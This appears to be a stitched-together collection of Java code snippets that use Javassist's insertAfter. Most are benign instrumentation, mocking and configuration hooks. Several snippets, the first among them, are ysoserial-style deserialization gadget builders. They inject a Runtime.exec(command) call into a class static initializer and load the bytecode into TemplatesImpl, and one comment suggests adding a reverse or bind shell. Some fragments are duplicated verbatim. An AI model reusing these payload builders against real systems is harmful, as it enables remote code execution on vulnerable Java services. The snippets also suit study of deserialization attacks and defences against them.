public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory ) throws Exception { final T templates = tplClass.newInstance(); // use template gadget class ClassPool pool = ClassPool.getDefault(); pool.insertClassPath(new ClassClassPath(StubTransletPayload.class)); pool.insertClassPath(new ClassClassPath(abstTranslet)); final CtClass clazz = pool.get(StubTransletPayload.class.getName()); // run command in static initializer // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections String cmd = "java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + "\");"; clazz.makeClassInitializer().insertAfter(cmd); // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion) clazz.setName("ysoserial.Pwner" + System.nanoTime()); CtClass superC = pool.get(abstTranslet.getName()); clazz.setSuperclass(superC); final byte[] classBytes = clazz.toBytecode(); // inject class bytes into instance Reflections.setFieldValue(templates, "_bytecodes", new byte[][] { classBytes, ClassFiles.classAsBytes(Foo.class) }); // required to make TemplatesImpl happy Reflections.setFieldValue(templates, "_name", "Pwnr"); Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance()); return templates; }
private void addCounterIncrementer(CtClass clazz, CtConstructor constructor) throws NotFoundException, CannotCompileException { //String cname = constructor.getName(); String code = "net.sf.jour.rt.agent.Elog.logEvent(new net.sf.jour.rt.agent.InstanceCounterEvent(this.getClass(), true));"; constructor.insertAfter(code); }
@InitMethod static void init(CtClass ctClass) throws CannotCompileException { CtConstructor staticInitializer = ctClass.makeClassInitializer(); staticInitializer.insertAfter("setBridge(" + GwtTestGWTBridge.class.getName() + ".get());"); }
@InitMethod static void init(CtClass ctClass) throws CannotCompileException { CtConstructor staticInitializer = ctClass.makeClassInitializer(); staticInitializer.insertAfter("setBridge(" + GwtTestGWTBridge.class.getName() + ".get());"); }
private void addConstructorNotification(final CtClass clazz) throws CannotCompileException { final String notificationCode = GlobalNotificationBuildSupport.class.getName() + ".testInstanceCreated(this);"; final boolean asFinally = !hasSuperClass(clazz); for (final CtConstructor constr : clazz.getDeclaredConstructors()) { constr.insertAfter( notificationCode, asFinally/* unless there is a super-class, because of this * problem: https://community.jboss.org/thread/94194*/); } }
Configuration conf = (Configuration) entry.getValue(); String clazz = conf.getClazz(); try { CtClass ctClass = ClassPool.getDefault().get(clazz); String appendCode = "{com.broada.bsp.gene.config.management.ConfigurationManager.manager.inject(this);\n}"; CtConstructor constructor[] = ctClass.getDeclaredConstructors(); for (CtConstructor ctConstructor : constructor) { ctConstructor.insertAfter(appendCode); } ctClass.toClass();
@InitMethod static void initClass(CtClass c) throws CannotCompileException { CtConstructor cons = JavassistUtils.findConstructor(c, Element.class, Renderer.class, Parser.class); cons.insertAfter("setText(\"\");"); }
@InitMethod static void initClass(CtClass c) throws CannotCompileException { CtConstructor cons = JavassistUtils.findConstructor(c, Element.class, Renderer.class, Parser.class); cons.insertAfter("setText(\"\");"); }
ClassPool classPool = ClassPool.getDefault(); CtClass ctClass = classPool.get("package1.package2.ClassToInject"); /* Notice that in this case I'm going for the default constructor * If you want another constructor you just have to materialize the CtClass, for * each parameter and pass them in the CtClass Array */ CtConstructor declaredConstructor = ctClass.getDeclaredConstructor(new CtClass[] {}); /* Now that you have your constructor you can use insertAfter(), this means, it * will be the last thing to be executed in the constructor. We'll rewrite the * label1 field with our new value. Notice that the string in insertAfter * argument is a regular, valid java code line. */ declaredConstructor.insertAfter("Label1 = new package3.package4.Label(new StringBuilder().append(\"somePrefixMayBeAStringOrAVariableInScope\").append(user.name));"); // and finally we write the bytecode ctClass.writeFile("/somePathToPutTheInjectedClassFile/");
ClassPool pool = ClassPool.getDefault(); CtClass factoryClass = pool.getCtClass("ServiceFactory"); CtConstructor constructor = factoryClass.getDeclaredConstructor(null); String setMockStatement = String.format("service = new %s();", MockServiceImpl.class.getCanonicalName()); constructor.insertAfter(setMockStatement); factoryClass.toClass(); new ServiceFactory().getService().say();
static byte[] createEvilBytecode(final String command) throws Exception { // 获取容器ClassPool,注入classpath ClassPool classPool = ClassPool.getDefault(); classPool.insertClassPath(new ClassClassPath(StubTransletPayload.class)); System.out.println("insert classpath: " + new ClassClassPath(StubTransletPayload.class)); // 获取class System.out.println("ClassName: " + StubTransletPayload.class.getName()); final CtClass clazz = classPool.get(StubTransletPayload.class.getName()); // 插入payload clazz.makeClassInitializer().insertAfter( "java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\"", "\\\"") + "\");" ); clazz.setName("lightless.pwner"); // 获取bytecodes final byte[] classBytes = clazz.toBytecode(); return classBytes; } }
private void insertWrapperCallInCtor(CtConstructor constructor, String wrapperName)throws NotFoundException, CannotCompileException { String wrapperCall = "((" + GeneratedAdvisorInstrumentor.getAdvisorFQN(constructor.getDeclaringClass())+ ")" + GeneratedAdvisorInstrumentor.GET_CURRENT_ADVISOR + ")." + wrapperName + "(this" + ((constructor.getParameterTypes().length == 0) ? "" : ", $$") + ");"; constructor.insertAfter(wrapperCall, false); }
public static TemplatesImpl createTemplatesImpl(final String command) throws Exception { final TemplatesImpl templates = new TemplatesImpl(); // use template gadget class ClassPool pool = ClassPool.getDefault(); pool.insertClassPath(new ClassClassPath(StubTransletPayload.class)); final CtClass clazz = pool.get(StubTransletPayload.class.getName()); // run command in static initializer // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\"", "\\\"") +"\");"); // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion) clazz.setName("ysoserial.Pwner" + System.nanoTime()); final byte[] classBytes = clazz.toBytecode(); // inject class bytes into instance Reflections.setFieldValue(templates, "_bytecodes", new byte[][] { classBytes, ClassFiles.classAsBytes(Foo.class)}); // required to make TemplatesImpl happy Reflections.setFieldValue(templates, "_name", "Pwnr"); Reflections.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); return templates; } }
public static TemplatesImpl createTemplatesImpl(final String command) throws Exception { final TemplatesImpl templates = new TemplatesImpl(); // use template gadget class ClassPool pool = ClassPool.getDefault(); pool.insertClassPath(new ClassClassPath(StubTransletPayload.class)); final CtClass clazz = pool.get(StubTransletPayload.class.getName()); // run command in static initializer // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\"", "\\\"") +"\");"); // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion) clazz.setName("ysoserial.Pwner" + System.nanoTime()); final byte[] classBytes = clazz.toBytecode(); // inject class bytes into instance Reflections.setFieldValue(templates, "_bytecodes", new byte[][] { classBytes, ClassFiles.classAsBytes(Foo.class)}); // required to make TemplatesImpl happy Reflections.setFieldValue(templates, "_name", "Pwnr"); Reflections.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); return templates; } }
private boolean instrumentConstructor(CtConstructor c) throws ClassNotFoundException, CannotCompileException { Pre posti = (Pre) c.getAnnotation(Pre.class); if (posti != null) { throw new CannotCompileException( c.getLongName() + " is a constructor may not be annotated with a @Post annotation as any super() in the constructor must be called before injected chex."); } boolean workDone = false; Post post = (Post) c.getAnnotation(Post.class); if (post != null ) { String preValue = post.value().trim(); if( preValue.equals("") ){ preValue = c.getName()+"$Post($$)"; } String code = this.createCode(preValue, post.message()); c.insertAfter(code); workDone = true; } return workDone; } }
@Override public CodeBuilder end() { try { semi(); cc.makeClassInitializer().insertAfter(toString()); } catch (CannotCompileException e) { throw new ObjectCompositionException(e.getMessage() + " for " + toString(), e); } clear(); return this; } };
@Override public CodeBuilder end() { try { semi(); cc.makeClassInitializer().insertAfter(toString()); } catch (CannotCompileException e) { throw new ObjectCompositionException(e.getMessage() + " for " + toString(), e); } clear(); return this; } };
public void addToClassInitializer(final String fullClass, final String code) { final CtClass classRef = getClass(fullClass); try { CtConstructor method = classRef.getClassInitializer(); if (method != null) { method.insertAfter(code); } else { method = CtNewConstructor.make(new CtClass[0], new CtClass[0], code, classRef); method.getMethodInfo().setName("<clinit>"); method.setModifiers(Modifier.STATIC); classRef.addConstructor(method); } } catch (final Throwable e) { maybeThrow(new IllegalArgumentException("Cannot add " + code + " to class initializer of " + fullClass, e)); } }
public void addToClassInitializer(final String fullClass, final String code) { final CtClass classRef = getClass(fullClass); try { CtConstructor method = classRef.getClassInitializer(); if (method != null) { method.insertAfter(code); } else { method = CtNewConstructor.make(new CtClass[0], new CtClass[0], code, classRef); method.getMethodInfo().setName("<clinit>"); method.setModifiers(Modifier.STATIC); classRef.addConstructor(method); } } catch (final Throwable e) { maybeThrow(new IllegalArgumentException("Cannot add " + code + " to class initializer of " + fullClass, e)); } }
public byte[] instrumentClassWithStaticStmt(String className, String instrumentationInstruction) throws CannotCompileException, NotFoundException, IOException { ClassPool pool = ClassPool.getDefault(); CtClass clazz = pool.get(className); clazz.defrost(); for (CtConstructor ctConstructor : clazz.getConstructors()) { ctConstructor.insertAfter(instrumentationInstruction); } CtMethod[] methods = clazz.getMethods(); if (methods != null) { for (CtMethod ctMethod : clazz.getMethods()) { if (Modifier.isStatic(ctMethod.getModifiers())) { ctMethod.insertAfter(instrumentationInstruction, true); } } } CtConstructor constructor = clazz.makeClassInitializer(); constructor.insertBefore(instrumentationInstruction); clazz.defrost(); return clazz.toBytecode(); } }